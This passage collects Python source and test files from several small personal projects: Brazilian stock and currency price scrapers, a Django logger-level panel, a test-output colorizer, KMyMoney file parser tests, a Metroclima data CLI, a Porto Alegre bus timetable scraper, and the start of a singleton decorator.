{
"source": "jonathadv/b3-stock-info",
"score": 3
} |
#### File: b3-stock-info/b3stockinfo/core.py
```python
from typing import Callable, List
from requests import Response
from requests.exceptions import RequestException
from requests_html import HTMLSession
from .exceptions import StockFactoryError
from .selectors import REIT_SELECTORS, STOCK_SELECTORS
from .serializers import JsonSerializer
class Stock(JsonSerializer):
def __init__(self, **kwargs):
        super().__init__()
self._ticker = None
self._name = None
self._value = None
self.__dict__.update(kwargs)
def attributes(self, display_dunder: bool = False):
attrs = []
for k in self.__dict__:
if k.startswith("_") and not display_dunder:
continue
attrs.append(k)
return attrs
def __str__(self):
return str(self.to_json())
def __repr__(self):
return (
f"{self.__class__.__name__}("
f"ticker='{self._ticker}', "
f"name='{self._name}', "
f"value={self._value})"
)
class StockFactory:
def __init__(self, base_url: str, timeout: int = 1):
self.base_url = base_url
self.session = HTMLSession()
self.timeout = timeout
def create(self, ticker: str, is_reit: bool = False) -> Stock:
url = self.base_url % ticker
try:
payload: Response = self.session.get(url, timeout=self.timeout)
except RequestException as err:
raise StockFactoryError(
f"An error has occurred while calling url=[{url}].", err
) from None
if "/error" in payload.url:
raise StockFactoryError(f"Unable to find Stock ticker `{ticker}`")
attrs = self.get_attributes(payload, is_reit)
return Stock(**attrs)
def get_attributes(self, payload: Response, is_reit: bool):
selectors = REIT_SELECTORS if is_reit else STOCK_SELECTORS
attrs = {}
for field, args in selectors.items():
value = self.get_value(payload, args["selector"], args["parsers"])
attrs[field] = value
if args.get("canonical"):
attrs[args.get("canonical")] = value
return attrs
@staticmethod
def get_value(payload: Response, selector: str, parsers: List[Callable] = None):
if not parsers:
parsers = []
try:
value = payload.html.find(selector)[0].text
for parser in parsers:
value = parser(value)
return value
except Exception:
return None
``` |
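A minimal usage sketch for the factory above. The base URL and tickers are placeholders (the real scraping endpoint is whatever the project is configured with), so treat this as an illustration of the API rather than working configuration:

```python
from b3stockinfo.core import StockFactory

# Hypothetical base URL containing a `%s` placeholder, as required by
# `self.base_url % ticker` in StockFactory.create().
factory = StockFactory("https://example.com/stocks/%s", timeout=5)

stock = factory.create("PETR4")                # regular stock, uses STOCK_SELECTORS
reit = factory.create("HGLG11", is_reit=True)  # REIT, uses REIT_SELECTORS

print(stock.attributes())  # public attributes extracted via the selectors
print(stock)               # serialized via JsonSerializer.to_json()
```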
{
"source": "jonathadv/django-logging-panel",
"score": 2
} |
#### File: django_logger_panel/views/base.py
```python
from typing import List, Dict
from django.views.generic import TemplateView
from django_logger_panel import BASE_URL
from django_logger_panel.__version__ import __version__
BASE_URL_KEY = "base_url"
PROJECT_VERSION_KEY = "project_version"
BREADCRUMBS_KEY = "breadcrumbs"
class LoggerBaseView(TemplateView):
"""The base class for Views in Logger Panel"""
def get_breadcrumbs(self) -> List[Dict[str, str]]:
"""Creates a list of dicts to work as breadcrumbs"""
breadcrumbs = []
crumbs = [v for v in self.request.path.split("/") if v]
while crumbs:
breadcrumbs.insert(
0,
{"url": f"/{'/'.join(crumbs)}", "name": crumbs.pop(), "is_last": False},
)
breadcrumbs[-1]["is_last"] = True
return breadcrumbs
def get_context_data(self, **kwargs):
"""
Adds `base_url`, `project_version` and `breadcrumbs` to the common context.
"""
base_context = {
BASE_URL_KEY: BASE_URL,
PROJECT_VERSION_KEY: __version__,
BREADCRUMBS_KEY: self.get_breadcrumbs(),
}
context: dict = super().get_context_data(**kwargs)
context.update(base_context)
return context
def render_to_response(self, context, **response_kwargs):
"""Check the accept header and calls the proper render function"""
if self.request.META.get("HTTP_ACCEPT") == "application/json":
return self.render_to_json_response(context)
return super().render_to_response(context, **response_kwargs)
def render_to_json_response(self, context: dict):
"""Each class should implement its own way
to render the JSON response.
"""
raise NotImplementedError()
```
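A standalone sketch of the breadcrumb-building loop above, runnable outside Django. The request path is an assumed example, not one taken from the project:

```python
def build_breadcrumbs(path: str):
    """Reproduces LoggerBaseView.get_breadcrumbs() for a plain path string."""
    breadcrumbs = []
    crumbs = [v for v in path.split("/") if v]
    while crumbs:
        breadcrumbs.insert(
            0,
            {"url": f"/{'/'.join(crumbs)}", "name": crumbs.pop(), "is_last": False},
        )
    breadcrumbs[-1]["is_last"] = True
    return breadcrumbs

# [{'url': '/loggerpanel', 'name': 'loggerpanel', 'is_last': False},
#  {'url': '/loggerpanel/django.request', 'name': 'django.request', 'is_last': True}]
print(build_breadcrumbs("/loggerpanel/django.request/"))
```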
#### File: django_logger_panel/views/logger.py
```python
import json
import logging
from django.http import JsonResponse, HttpResponseRedirect
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_exempt
from django_logger_panel import BASE_URL
from django_logger_panel.core import LEVELS, set_logger_level, get_all_loggers
from django_logger_panel.serializers import (
logger_response_serializer,
logger_serializer,
)
from django_logger_panel.views.base import LoggerBaseView
LOGGER = logging.getLogger(__name__)
LOGGERS_KEY = "loggers"
LOGGER_NAME_KEY = "logger_name"
LOGGER_LEVEL_KEY = "logger_level"
LOGGER_LEVELS_KEY = "logger_levels"
LOGGER_INSTANCE_KEY = "logger"
ERROR_KEY = "error"
class LoggerListView(LoggerBaseView):
"""
View to List the loggers
"""
template_name = "loggerpanel/loggers.html"
success_url = BASE_URL
def post(self, request, *_args, **kwargs):
"""Calls the `set_logger_level()` function with the arguments received in the `form`"""
logger_name = request.POST.get(LOGGER_NAME_KEY)
logger_level = request.POST.get(LOGGER_LEVEL_KEY)
try:
set_logger_level(logger_name, logger_level)
return HttpResponseRedirect(self.success_url)
# pylint: disable=broad-except
except Exception as err:
LOGGER.error(err)
context = self.get_context_data(**kwargs)
context[ERROR_KEY] = str(err)
return self.render_to_response(context)
def get_context_data(self, **kwargs):
"""Adds `loggers` and `logger_levels` to the context"""
context: dict = super().get_context_data(**kwargs)
context[LOGGERS_KEY] = get_all_loggers()
context[LOGGER_LEVELS_KEY] = LEVELS
return context
def render_to_json_response(self, context: dict):
"""Renders `logger_levels` and `loggers` as JSON"""
data = logger_response_serializer(
context[LOGGER_LEVELS_KEY], context[LOGGERS_KEY]
)
return JsonResponse(data)
@method_decorator(csrf_exempt, name="dispatch")
class LoggerDetailView(LoggerBaseView):
"""View to display the details of a specific logger instance"""
template_name = "loggerpanel/detail.html"
# pylint: disable=no-self-use
# pylint: disable=broad-except
def post(self, request, *_args, **kwargs):
"""Handles the details for a logger instance"""
try:
logger_name = kwargs.get(LOGGER_NAME_KEY)
logger_level = json.loads(request.body)[LOGGER_LEVEL_KEY]
set_logger_level(logger_name, logger_level)
data = logger_serializer(get_all_loggers()[logger_name])
return JsonResponse(data)
except KeyError as err:
LOGGER.error(err)
return JsonResponse({ERROR_KEY: f"missing argument {err}"}, status=400)
except Exception as err:
LOGGER.error(err)
return JsonResponse({ERROR_KEY: str(err)}, status=400)
def get_context_data(self, **kwargs):
"""Adds `logger_name` and a `Logger` instance to the context"""
logger_name = kwargs.get(LOGGER_NAME_KEY)
context: dict = super().get_context_data(**kwargs)
loggers = get_all_loggers()
context[LOGGER_NAME_KEY] = logger_name
context[LOGGER_INSTANCE_KEY] = loggers.get(logger_name)
return context
def render_to_json_response(self, context: dict):
"""Renders a `Logger` instance as JSON"""
data = logger_serializer(context[LOGGER_INSTANCE_KEY])
return JsonResponse(data)
```
#### File: django-logging-panel/tests/test_url.py
```python
import json
from django.test import TestCase, Client
from django.urls import reverse
from http import HTTPStatus
class RestTestCase(TestCase):
"""Test suite for REST endpoints."""
def setUp(self):
"""Define the test variables."""
self.client = Client()
def test_list_all_loggers(self):
"""Test listing all loggers."""
url = reverse("loggerpanel-list")
resp = self.client.get(url, HTTP_ACCEPT="application/json")
content = json.loads(resp.content)
self.assertEqual(resp.status_code, HTTPStatus.OK)
self.assertIsInstance(content["log_levels"], dict)
self.assertIsInstance(content["loggers"], list)
def test_change_log_level(self):
"""Test change a logger level."""
previous_level = "WARNING"
new_level = "DEBUG"
url = reverse("loggerpanel-detail", kwargs={"logger_name": "root"})
resp = self.client.get(url, HTTP_ACCEPT="application/json")
content = json.loads(resp.content)
self.assertEqual(resp.status_code, HTTPStatus.OK)
self.assertEqual(content["effectiveLevel"]["name"], previous_level)
resp = self.client.post(
url, {"logger_level": new_level}, content_type="application/json"
)
self.assertEqual(resp.status_code, HTTPStatus.OK)
resp = self.client.get(url, HTTP_ACCEPT="application/json")
content = json.loads(resp.content)
self.assertEqual(resp.status_code, HTTPStatus.OK)
self.assertEqual(content["effectiveLevel"]["name"], new_level)
``` |
{
"source": "jonathadv/django-test-prettify",
"score": 3
} |
#### File: jonathadv/django-test-prettify/tests.py
```python
import sys
import unittest
from contextlib import contextmanager
from io import StringIO
from unittest_prettify.colorize import (
BLUE,
GREEN,
MAGENTA,
RED,
RESET,
WHITE,
YELLOW,
colorize,
)
@contextmanager
def captured_output():
new_out, new_err = StringIO(), StringIO()
old_out, old_err = sys.stdout, sys.stderr
try:
sys.stdout, sys.stderr = new_out, new_err
yield sys.stdout, sys.stderr
finally:
sys.stdout, sys.stderr = old_out, old_err
def _extract_test_comment(stderr):
value = stderr.getvalue().strip()
value = value.split("\n")[1]
value = value.replace("... ok", "").strip()
return value
class Test:
@colorize(color=GREEN)
class ColorizedClass(unittest.TestCase):
@colorize(color=WHITE)
def test_white(self):
"""This test comment should be WHITE"""
@colorize(color=RED)
def test_red(self):
"""This test comment should be RED"""
@colorize(color=BLUE)
def test_blue(self):
"""This test comment should be BLUE"""
@colorize(color=MAGENTA)
def test_magenta(self):
"""This test comment should be MAGENTA"""
@colorize(color=YELLOW)
def test_yellow(self):
"""This test comment should be YELLOW"""
def test_green1(self):
"""This test comment should be with the default color set as GREEN"""
class NotColorizedClass(unittest.TestCase):
def test_no_color(self):
"""This test comment should not have color"""
@colorize(color=BLUE)
def test_blue(self):
"""This test comment should be BLUE"""
@colorize(color=RED)
def test_red(self):
"""This test comment should be RED"""
@colorize(color=GREEN)
class NoCommentClass(unittest.TestCase):
def test_with_no_comment(self):
pass
class ColorizedClassTestCase(unittest.TestCase):
tests = (
{
"name": "test_white",
"comment": "This test comment should be WHITE",
"color": WHITE,
},
{
"name": "test_red",
"comment": "This test comment should be RED",
"color": RED,
},
{
"name": "test_blue",
"comment": "This test comment should be BLUE",
"color": BLUE,
},
{
"name": "test_magenta",
"comment": "This test comment should be MAGENTA",
"color": MAGENTA,
},
{
"name": "test_yellow",
"comment": "This test comment should be YELLOW",
"color": YELLOW,
},
{
"name": "test_green1",
"comment": "This test comment should be with the default color set as GREEN",
"color": GREEN,
},
)
def test_colorized_class(self):
"""Should match all test description colors against the @colorize decorator in method or in the class"""
for test in self.tests:
with captured_output() as (_, err):
suite = unittest.TestSuite([Test.ColorizedClass(test["name"])])
unittest.TextTestRunner(verbosity=2).run(suite)
current_value = _extract_test_comment(err)
expected_value = f"{test['color']}{test['comment']}{RESET}"
self.assertEqual(current_value, expected_value)
class ColorizedMethodsOnlyTestCase(unittest.TestCase):
tests = (
{
"name": "test_blue",
"comment": "This test comment should be BLUE",
"color": BLUE,
},
{
"name": "test_red",
"comment": "This test comment should be RED",
"color": RED,
},
)
def test_colorized_methods(self):
"""Should match all test description colors against the @colorize decorator in the mothod"""
for test in self.tests:
with captured_output() as (_, err):
suite = unittest.TestSuite([Test.NotColorizedClass(test["name"])])
unittest.TextTestRunner(verbosity=2).run(suite)
current_value = _extract_test_comment(err)
expected_value = f"{test['color']}{test['comment']}{RESET}"
self.assertEqual(current_value, expected_value)
def test_not_colorized_method(self):
"""Method without @colorize should not have color"""
with captured_output() as (_, err):
suite = unittest.TestSuite([Test.NotColorizedClass("test_no_color")])
unittest.TextTestRunner(verbosity=2).run(suite)
current_value = _extract_test_comment(err)
expected_value = "This test comment should not have color"
self.assertEqual(current_value, expected_value)
class NoCommentTestCase(unittest.TestCase):
def test_not_commented_method(self):
"""Should not throw error even if there is not comment in the method"""
with captured_output() as (_, err):
suite = unittest.TestSuite([Test.NoCommentClass("test_with_no_comment")])
unittest.TextTestRunner(verbosity=2).run(suite)
current_value = _extract_test_comment(err)
self.assertEqual(current_value, "")
if __name__ == "__main__":
unittest.main(verbosity=2)
``` |
{
"source": "jonathadv/ir-calculator",
"score": 3
} |
#### File: ir-calculator/ircalculator/reports.py
```python
from ircalculator.stocks import Stock, Transaction
from typing import List
def display(report):
print("-" * 60)
print("\n".join(report))
print("-" * 60)
def build_sold_only(stocks: List[Stock]) -> List[str]:
report = []
for stock in stocks:
result = stock.total_amount_with_cost(Transaction.SELL)
if result:
report.append(f"{stock.ticker}: {result}")
return report
def build_overall_results(stocks: List[Stock]) -> List[str]:
report = []
for stock in stocks:
result = stock.overall_result()
report.append(f"{stock.ticker}: {result}")
return report
def build_transactions(stock: Stock):
report = []
report.append("----------------------- Transaction -----------------------")
for p in stock.get_transactions():
report.append(str(p))
report.append(f"\t{p.trans_type}: {p.total()}")
for c in p.costs:
report.append(f"\t\t{c}")
report.append("-" * 60)
return "\n".join(report)
def build_details(stocks: List[Stock]) -> List[str]:
report = []
for stock in stocks:
transactions = build_transactions(stock)
sell = stock.total_amount_with_cost(Transaction.SELL)
buy = stock.total_amount_with_cost(Transaction.BUY)
total_amount = buy if not sell else sell - buy
content = f"""
# {stock.ticker}
Total Sold: {stock.n_sold()}
Total Purchased: {stock.n_purchased()}
Total Amount (RS): {stock.total_amount()}
Total Cost (RS): {stock.total_cost()}
Amount + Cost (RS): {total_amount}
{transactions}
"""
report.append(content)
return report
def build_for_spreadsheet(stocks: List[Stock]) -> List[str]:
pass
``` |
{
"source": "jonathadv/kmymoney-stock-server",
"score": 3
} |
#### File: jonathadv/kmymoney-stock-server/stock-server.py
```python
import time
import sys
import requests
from datetime import datetime
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
br_stock_url = 'https://query2.finance.yahoo.com/v10/finance/quoteSummary/{code}.SA?formatted=true&crumb=5zlPOxz.vH.&lang=pt-BR&region=BR&modules=price'
usa_stock_url = 'https://query1.finance.yahoo.com/v8/finance/chart/{code}?region=US&lang=en-US&includePrePost=false&interval=2m&range=1d&corsDomain=finance.yahoo.com&.tsrc=finance'
currency_url = 'https://query1.finance.yahoo.com/v8/finance/chart/{code}=X'
ignore_urls = ['/favicon.ico']
def handle_br_stock(json, status_code):
return (json.get('quoteSummary').get('result')[0].get('price').get('regularMarketPrice').get('raw'), status_code)
def handle_currency(json, status_code):
return (json.get('chart').get('result')[0].get('meta').get('regularMarketPrice'), status_code)
def handle_usa_stock(json, status_code):
return (json.get('chart').get('result')[0].get('meta').get('regularMarketPrice'), status_code)
class SimpleHandler(BaseHTTPRequestHandler):
def do_GET(self):
if '/stock/br' in self.path:
url = br_stock_url
process_fn = handle_br_stock
elif '/stock/usa' in self.path:
url = usa_stock_url
process_fn = handle_usa_stock
elif '/currency' in self.path:
url = currency_url
process_fn = handle_currency
elif self.path in ignore_urls:
return
else:
print "'%s' not found!" % str(self.path)
return
code = self.path.split('/')[-1]
price, status_code = self.get_info(url, code, process_fn)
response = "{}|{}".format(price, datetime.now().strftime('%Y-%m-%d'))
self.send(response, status_code)
def send(self, response, status_code):
self.send_response(status_code)
self.send_header('Content-length',str(len(response)))
self.send_header('Content-Type','text/plain')
self.end_headers()
self.wfile.write(response)
def get_info(self, url, code, process_fn):
url = url.replace('{code}', code)
print "Getting Stock info... url=%s" % url
sys.stdout.flush()
resp = requests.get(url)
print "Request done!"
sys.stdout.flush()
if(resp.status_code == 200):
return process_fn(resp.json(), 200)
else:
return ("", 404)
def main():
host = '0.0.0.0'
port = 1203
httpd = HTTPServer((host, port), SimpleHandler)
print time.asctime(), 'Server Starts - %s:%s' % (host, port)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print time.asctime(), 'Server Stops - %s:%s' % (host, port)
if __name__ == '__main__':
main()
``` |
{
"source": "jonathadv/kmy",
"score": 3
} |
#### File: kmy/tests/test_payeeaddress.py
```python
import unittest
from kmy.kmy import Kmy
file_name = 'Test.kmy'
class TestPayeeAddress(unittest.TestCase):
def setUp(self):
mm = Kmy.from_kmy_file(file_name)
self.address = mm.payees[0].address
def test_read_telephone(self):
self.assertEqual('+1 312 123 4567', self.address.telephone)
def test_read_state(self):
self.assertEqual('WH', self.address.state)
def test_read_city(self):
self.assertEqual('Whoville', self.address.city)
def test_read_street(self):
self.assertEqual("123 Street\n42 Something", self.address.street)
def test_read_postcode(self):
self.assertEqual('WHO 123', self.address.postCode)
if __name__ == '__main__':
unittest.main()
```
#### File: kmy/tests/test_split.py
```python
import unittest
from kmy.kmy import Kmy
file_name = 'Test.kmy'
class TestSplit(unittest.TestCase):
def setUp(self):
mm = Kmy.from_kmy_file(file_name)
self.splits = mm.transactions[0].splits
self.split0 = self.splits[0]
def test_read_splits_count(self):
self.assertEqual(2, len(self.splits))
def test_read_payee(self):
self.assertEqual('', self.split0.payee)
def test_read_memo(self):
self.assertEqual('', self.split0.memo)
def test_read_shares(self):
self.assertEqual('42/1', self.split0.shares)
def test_read_number(self):
self.assertEqual('', self.split0.number)
def test_read_action(self):
self.assertEqual('', self.split0.action)
def test_read_price(self):
self.assertEqual('1/1', self.split0.price)
def test_read_account(self):
self.assertEqual('A000001', self.split0.account)
def test_read_reconcileflag(self):
self.assertEqual('0', self.split0.reconcileFlag)
def test_read_bankid(self):
self.assertEqual('', self.split0.bankId)
def test_read_value(self):
self.assertEqual('42/1', self.split0.value)
def test_read_reconciledate(self):
self.assertEqual('', self.split0.reconcileDate)
def test_read_id(self):
self.assertEqual('S0001', self.split0.id)
if __name__ == '__main__':
unittest.main()
```
#### File: kmy/tests/test_user_address.py
```python
import unittest
from kmy.kmy import Kmy
file_name = 'Test.kmy'
class TestUserAddress(unittest.TestCase):
def setUp(self):
mm = Kmy.from_kmy_file(file_name)
self.useraddress = mm.user.address
def test_read_telephone(self):
self.assertEqual('Telephone', self.useraddress.telephone)
def test_read_county(self):
self.assertEqual('CountyState', self.useraddress.county)
def test_read_city(self):
self.assertEqual('Town', self.useraddress.city)
def test_read_zipcode(self):
self.assertEqual('PostalCode', self.useraddress.zipcode)
def test_read_street(self):
self.assertEqual('Street', self.useraddress.street)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jonathadv/metroclima-cli",
"score": 3
} |
#### File: metroclima-cli/metroclima/cli.py
```python
import sys
from click import Choice, group, option, version_option
from . import metroclima
from .__version__ import __title__, __version__
from .options import QUARTERS, YEARS, FileTypes, PostKeys, Sensors, Stations
FILE_TYPES = [t.value for t in FileTypes]
SENSORS = [s.name for s in Sensors]
STATIONS = [l.name for l in Stations]
YEAR_OPTIONS = [str(y) for y in YEARS]
QUARTER_OPTIONS = [str(q) for q in QUARTERS]
def _stderr(message, end='\n', flush=False):
if flush:
sys.stderr.flush()
print(message, file=sys.stderr, end=end)
def _stdout(message, end='\n'):
print(message, end=end)
@group(context_settings={'help_option_names': ['-h', '--help']})
@version_option(version=__version__, prog_name=__title__)
def cli():
"""A simple tool to retrieve information from the Porto Alegre city's Metroclima database."""
pass
@cli.command('get')
@option('-f', '--filetype',
type=Choice(FILE_TYPES),
default='csv',
help='The dump file type')
@option('-y', '--year',
type=Choice([str(i) for i in YEARS]),
default=YEAR_OPTIONS[-1],
help='Choose which year')
@option('-q', '--quarter',
type=Choice([str(q) for q in QUARTERS]),
default=str(QUARTER_OPTIONS[0]),
help='Choose which quarter')
@option('-s', '--sensor',
type=Choice(SENSORS),
default=SENSORS[0],
help='Choose the type of sensor')
@option('-l', '--station',
type=Choice(STATIONS),
default=STATIONS[0],
help='Choose which station')
@option('-d', '--download',
is_flag=True,
default=False,
help="Downloads ")
def get_single_dump(filetype, year, quarter, sensor, station, download):
"""Retrieve dump from Metroclima site"""
"""
:type download: bool
:type station: str
:type sensor: str
:type quarter: str
:type year: str
:type filetype: str
:param filetype: the file extension.
:param year: the year of reference for the data do be retrieved.
:param quarter: the year's quarter of reference for the data do be retrieved.
:param sensor: the sensor from which the information shoule be retrieved.
:param station: from which location the information belongs to.
:param download: determine if the tool should download the file or retreive the URL only.
"""
options = {
PostKeys.FILE_TYPE.value: filetype,
PostKeys.YEAR.value: int(year),
PostKeys.QUARTER.value: int(quarter),
PostKeys.STATION.value: Stations[station].value,
PostKeys.SENSOR.value: Sensors[sensor].value,
PostKeys.SEARCH_STATIONS.value: '',
}
try:
_stderr('Retrieving download URL...')
url = metroclima.retrieve_download_url(options)
_stdout(url)
if download:
_stderr('Downloading file...')
file_name = metroclima.download_file(url)
_stderr('File download at:')
_stdout(file_name)
except metroclima.MetroclimaError as err:
_stderr(err)
def run():
""" Call cli setting the program title """
cli(prog_name=__title__)
``` |
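A small sketch of driving the `cli` group above programmatically with Click's test runner. It only asks the `get` command for its help text, so no request to the Metroclima site is made; the import path assumes the package is importable as `metroclima`:

```python
from click.testing import CliRunner

from metroclima.cli import cli

runner = CliRunner()
result = runner.invoke(cli, ["get", "--help"])  # print the options of the `get` command
print(result.output)
assert result.exit_code == 0
```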
{
"source": "jonathadv/poetry-playground",
"score": 2
} |
#### File: poetry-playground/tests/test_core.py
```python
from module.core import say_hi
def test_say_hi():
assert "Hi" == say_hi()
``` |
{
"source": "jonathadv/PyPoABus",
"score": 2
} |
#### File: PyPoABus/pypoabus/pypoabus.py
```python
import json
import re
import sys
import pkg_resources
import requests
from bs4 import BeautifulSoup
from .entities import BusLine, BusLineItem, Schedule
from .exceptions import NoContentAvailableError, RemoteServerError
# Flag to enable CMD to display the URL built.
DEBUG_URLS = False
def _load_config():
""" Function to open configuration file """
config_file = 'config.json'
conf_file = open(pkg_resources.resource_filename(__package__, config_file))
config = json.load(conf_file)
return config
def _build_url(action, parameter):
""" Function to build URL using information
from config.json file """
config = _load_config()
base_url = config.get('eptc_base_url')
url_action = config.get(action).get('action')
if action == 'list':
parameter = config.get(action).get('zones').get(parameter).get('code')
url_parameters = config.get(action).get('parameters').format(parameter)
url = '{}/{}?{}'.format(base_url, url_action, url_parameters)
if DEBUG_URLS:
print('DEBUG - URL: {}'.format(url), file=sys.stderr)
return url
def _parse_timetable_page(html_doc):
"""
Function to parse the HTML page.
It assumes that the HTML follows the below order:
- Bus line's name and code
- Direction (origin/destination)
- Schedule Type (business days, saturday, sunday)
Example:
281 - <NAME> # Code and Name
        NORTE/SUL # Origin/Destination
Dias Uteis # Business days
05:40 # Time
05:51 # Time
Sabados # Saturday
05:40 # Time
06:00 # Time
Domingos # Sundays
06:00 # Time
06:24 # Time
"""
div_pattern_to_find = 'align="center"><b>'
time_re = r'(\d\d:\d\d)'
direction_re = '([A-Z]+/[A-Z]+)'
day_re = '(Dias Úteis)|(Sábados)|(Domingos)'
div_list = []
soup = BeautifulSoup(html_doc, 'html.parser')
for div in soup.find_all('div'):
if div_pattern_to_find in str(div):
div_list.append(div.text)
if not div_list:
raise NoContentAvailableError('Unable to retrieve information from EPTC web site. '
'Please check the bus line code and try again.')
line_title = div_list[0].split('-')
line_code = line_title[0].strip()
line_name = line_title[1].strip()
bus_line = BusLine(line_name, line_code)
schedule = None
direction = None
for i in range(1, len(div_list)):
if re.match(direction_re, div_list[i].strip()) is not None:
direction = div_list[i].strip()
continue
if re.match(day_re, div_list[i].strip()) is not None:
schedule = Schedule(div_list[i].strip(), direction, [])
bus_line.add_schedule(schedule)
continue
if re.match(time_re, div_list[i].strip()) is not None:
schedule.add_departure_time(div_list[i].strip())
return bus_line
def _add_missing_tags(html_doc):
"""Fixes a issue in the orginal HTML, where the tag <Option> is not closed..
Changes from:
<Select Name=Linha class='ordenacaoSelect'>
<Option Value='510-87'>510 - AUXILIADORA
<Option Value='620-5'>520 - TRIANGULO/24 DE OUTUBRO
To:
<Select Name=Linha class='ordenacaoSelect'>
<Option Value='510-87'>510 - AUXILIADORA</Option>
<Option Value='620-5'>520 - TRIANGULO/24 DE OUTUBRO</Option>
"""
opened_option_tag = r'<Option'
closed_option_re = r'</Option>'
if re.search(closed_option_re, html_doc, re.I) is None:
html_doc = html_doc.replace(opened_option_tag, closed_option_re + opened_option_tag)
return html_doc
def _parse_bus_list_page(html_doc):
"""
Function to parse the bus lines names
"""
bus_line_list = []
html_doc = _add_missing_tags(html_doc)
soup = BeautifulSoup(html_doc, 'html.parser')
for line in soup.find_all('option'):
line_name = re.sub('[ ]+', ' ', line.text).strip()
line_code = line.get('value')
bus_line = BusLineItem(line_code, line_name)
bus_line_list.append(bus_line)
return bus_line_list
def _get_html(url):
"""
Function to retrieve the HTML Page
"""
try:
response = requests.get(url)
except requests.exceptions.ConnectionError as error:
raise RemoteServerError('Unable to establish connection.', error)
if response.status_code != 200:
raise RemoteServerError('Unable to get EPTC page content. '
'HTTP code: {}, reason: {}'
.format(response.status_code, response.reason))
return response.text
def get_bus_timetable(line_code):
"""
Get timetable from the given bus line
"""
url = _build_url('schedule', line_code)
html = _get_html(url)
return _parse_timetable_page(html)
def list_bus_lines(zone):
"""
Get all bus lines from a zone
"""
url = _build_url('list', zone)
html = _get_html(url)
return _parse_bus_list_page(html)
```
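A hedged usage sketch for the two public functions above. It needs network access to the EPTC site; the zone and line-code values are the same ones used in the project's tests further down:

```python
from pypoabus import pypoabus

# List bus lines for one of the configured zones ('north', 'south', 'east', 'public').
for line in pypoabus.list_bus_lines("south")[:5]:
    print(line)

# Fetch the timetable for a specific line code, e.g. '281-1' as in the integration tests.
timetable = pypoabus.get_bus_timetable("281-1")
print(timetable.code, timetable.name)
```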
#### File: PyPoABus/tests/test_cli.py
```python
import pytest
import pytest_mock
import requests
from pypoabus import __main__, __title__, __version__
from pypoabus.pypoabus import BusLine
def test_get_version(mock, capsys):
""" Check if -v returns the correct application version """
mock.patch('sys.argv', ['', '-v'])
expected = '{} {}\n'.format(__title__, __version__)
try:
__main__.main()
except SystemExit:
pass
capture_result = capsys.readouterr()
assert capture_result.out == expected
def test_get_line_list_from_valid_zone(mock, capsys):
""" Checks if cli returns the correct bus list in unformatted json
for correct zone
"""
expected = '{ "list": ["l1", "l2"] }\n'
mock.patch('sys.argv', ['', '-l', 'south'])
mock.patch('pypoabus.pypoabus.list_bus_lines', return_value='["l1", "l2"]')
try:
__main__.main()
except SystemExit:
pass
capture_result = capsys.readouterr()
assert capture_result.out == expected
def test_get_line_list_from_invalid_zone(mock, capsys):
""" Checks if cli returns the correct error message
for incorrect zone argument
"""
zone = 'NOT_VALID_ZONE'
mock.patch('sys.argv', ['', '-l', zone])
expected = "usage: {} [-h] [-v] [-l zone | -t line_code] [-f format]" \
" [-d]\npypoabus: error: argument -l/--list: " \
"invalid choice: '{}' (choose from 'north', " \
"'south', 'east', 'public')\n".format(__title__, zone)
try:
__main__.main()
except SystemExit:
pass
capture_result = capsys.readouterr()
assert capture_result.err == expected
def test_get_timetable_from_valid_line(mock, capsys):
""" Checks if cli returns the correct bus timetable in unformatted json
for the correct busline
"""
expected = '{"code": "bar", "name": "foo", "schedules": []}\n'
mock.patch('sys.argv', ['', '-t', 'non_existing_line'])
mock.patch('pypoabus.pypoabus.get_bus_timetable', return_value=BusLine('foo', 'bar'))
try:
__main__.main()
except SystemExit:
pass
capture_result = capsys.readouterr()
assert capture_result.out == expected
def test_get_timetable_from_invalid_line(mock, capsys):
""" Checks if cli returns the correct error message
for the incorrect busline argument
"""
expected = 'pypoabus: Error to connect to the server: ' \
'Unable to get EPTC page content. HTTP code: 500, reason: ' \
'Internal Server Error\n\n'
mocked_response = requests.Response()
mocked_response.status_code = 500
mocked_response.reason = 'Internal Server Error'
mock.patch('sys.argv', ['', '-t', 'non_existing_line'])
mock.patch('requests.get', return_value=mocked_response)
try:
__main__.main()
except SystemExit:
pass
capture_result = capsys.readouterr()
assert capture_result.err == expected
```
#### File: PyPoABus/tests/test_integration.py
```python
import pytest
import pytest_mock
from pypoabus import pypoabus
from pypoabus.exceptions import NoContentAvailableError, RemoteServerError
class TestIntegration:
""" Integration testing """
@staticmethod
def test_get_real_south_zone_bus_list():
""" Get the south zone bus list from EPTC website """
zone = 'south'
bus_list = pypoabus.list_bus_lines(zone)
assert isinstance(bus_list, list)
assert bus_list
@staticmethod
def test_get_real_north_zone_bus_list():
""" Get the north zone bus list from EPTC website """
zone = 'north'
bus_list = pypoabus.list_bus_lines(zone)
assert isinstance(bus_list, list)
assert bus_list
@staticmethod
def test_get_real_east_zone_bus_list():
""" Get the east zone bus list from EPTC website """
zone = 'east'
bus_list = pypoabus.list_bus_lines(zone)
assert isinstance(bus_list, list)
assert bus_list
@staticmethod
def test_get_real_public_zone_bus_list():
""" Get the public bus list from EPTC website """
zone = 'public'
bus_list = pypoabus.list_bus_lines(zone)
assert isinstance(bus_list, list)
assert bus_list
@staticmethod
def test_get_real_south_zone_bus_timetable():
""" Get a south zone bus timetble from EPTC website """
bus_line_code = '281-1'
bus_line_name = 'CAMPO NOVO / MORRO AGUDO'
timetable = pypoabus.get_bus_timetable(bus_line_code)
assert timetable.code == bus_line_code.replace('-', '')
assert timetable.name == bus_line_name
@staticmethod
def test_error_when_sending_invalid_bus_line_code():
""" Check if correct error is raised when trying to fetch invalid bus line code """
bus_line_code = 'foo'
with pytest.raises(RemoteServerError, match=r'.*Unable to '
r'get EPTC page content.*'):
pypoabus.get_bus_timetable(bus_line_code)
@staticmethod
def test_error_when_html_does_not_contain_information(mocker):
""" Check if correct error is raised when the response HTML does not contain information """
mocker.patch('pypoabus.pypoabus._get_html', return_value='<html></html>')
bus_line_code = 'foo'
with pytest.raises(NoContentAvailableError, match=r'.*Unable to retrieve '
r'information from EPTC web site.*'):
pypoabus.get_bus_timetable(bus_line_code)
``` |
{
"source": "jonathadv/python-design-patterns-samples",
"score": 4
} |
#### File: python-design-patterns-samples/patterns/singleton.py
```python
def singleton(cls):
"""
This decorator ensures that only one instance of
the decorated class will be created in runtime.
:param cls: a class to be decorated as singleton
:type cls: class
Example:
A decorated class that displays its own `id(self)`
